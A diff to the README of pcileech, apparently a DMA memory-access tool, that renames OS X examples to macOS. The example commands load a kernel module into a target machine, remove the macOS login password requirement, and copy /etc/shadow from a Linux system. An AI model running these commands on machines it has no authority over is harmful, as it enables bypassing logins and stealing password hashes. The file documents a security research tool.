ufrisk/pcileech/readme.md

 Examples:
 =========
-Load OS X kernel module:
+Load macOS kernel module:
-* ` pcileech.exe kmdload -kmd osx_x64 `
+* ` pcileech.exe kmdload -kmd macos `

-Remove OS X password requirement, requires that the KMD is loaded at an address.
+Remove macOS password requirement, requires that the KMD is loaded at an address.
 In this example 0x11abc000 is used.
-* ` pcileech.exe ax64_unlock -kmd 0x11abc000 -0 1 `
+* ` pcileech.exe macos_unlock -kmd 0x11abc000 -0 1 `

 Retrieve the file /etc/shadow from a Linux system without pre-loading a KMD.
 * ` pcileech.exe lx64_filepull -kmd LINUX_X64 -s /etc/shadow -out c:\temp\shadow `